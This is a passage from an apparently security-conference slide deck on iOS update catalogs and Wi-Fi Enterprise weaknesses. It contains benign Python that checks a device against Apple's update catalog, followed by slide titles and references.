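    return tuple(int(part) for part in version.split("."))


def assets_for_device(catalog_bytes, device, current_build=None):
    """Assets installable on `device`: full updates plus deltas whose prerequisite build matches."""
    applicable = []
    for asset in plistlib.loads(catalog_bytes).get("Assets", []):
        if device not in asset.get("SupportedDevices", []):
            continue
        prerequisite = asset.get("PrerequisiteBuild")
        if prerequisite is not None and prerequisite != current_build:
            continue  # delta for a different starting build
        applicable.append(asset)
    return applicable


def latest_for_device(catalog_bytes, device, current_build=None):
    """(OSVersion, Build, download URL) of the newest applicable asset, or None."""
    candidates = assets_for_device(catalog_bytes, device, current_build)
    if not candidates:
        return None
    best = max(candidates, key=lambda a: (version_key(a["OSVersion"]), a["Build"]))
    return best["OSVersion"], best["Build"], best["__BaseURL"] + best["__RelativePath"]


def is_behind(catalog_bytes, device, current_version, current_build=None):
    """True when the catalog advertises a newer OS version for this device than it runs."""
    latest = latest_for_device(catalog_bytes, device, current_build)
    return latest is not None and version_key(latest[0]) > version_key(current_version)
```

For an iPhone8,1 on 9.3.1 (13E238) the constructed catalog yields 9.3.2 / 13F69, and `is_behind` returns True; for a device identifier not listed it returns None and False. The catalog URLs on the slide are plain http://, so comparing what a device reports with a catalog fetched from elsewhere is a cheap way to notice the "update freeze" the next slide demonstrates.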

Page 49

iOS & watchOS Update Freeze

Video recorded on June 20, 2016. Latest versions available at the time: iOS 9.3.2, watchOS 2.1.1

Page 50

Wi-Fi

Page 51

"What vulnerabilities get a CVE assigned to them?"

"The ones that are really critical!"

Page 52

Really Critical CVE :)

• "Wi-Fi: Why iOS (Android & others) Fail Inexplicably" (March 2013)
  – Raúl Siles (DinoSec): http://www.dinosec.com/en/lab.html#Rooted2013WiFi
• iOS 8.3 (April 8, 2015)
  – You can probably get a CVE assigned to you too, if you pay attention…
  – https://support.apple.com/en-us/HT204661

radius.dinosec.com

Timeline: 2013

Page 53

A Not So Critical (Nonexistent) CVE :(

• "Wi-Fi: Why iOS (Android & others) Fail Inexplicably" (March 2013)
  – Raúl Siles (DinoSec): http://www.dinosec.com/en/lab.html#Rooted2013WiFi
• Wi-Fi WPA(2)/Enterprise attacks (no CVE assigned: it's a feature, not a bug…)

Find the differences?

Page 54

Wi-Fi Enterprise Networks: Set-Up

Page 55

Wi-Fi Enterprise Networks: First Time

Page 56

Wi-Fi Enterprise Networks: Next Times

Page 57

Conclusions

Page 58

Spanish Collection of Proverbs

"An apple a day keeps the intruder away"

Page 59

Questions?

Page 60

www.dinosec.com, @dinosec
Raúl Siles, raul@dinosec.com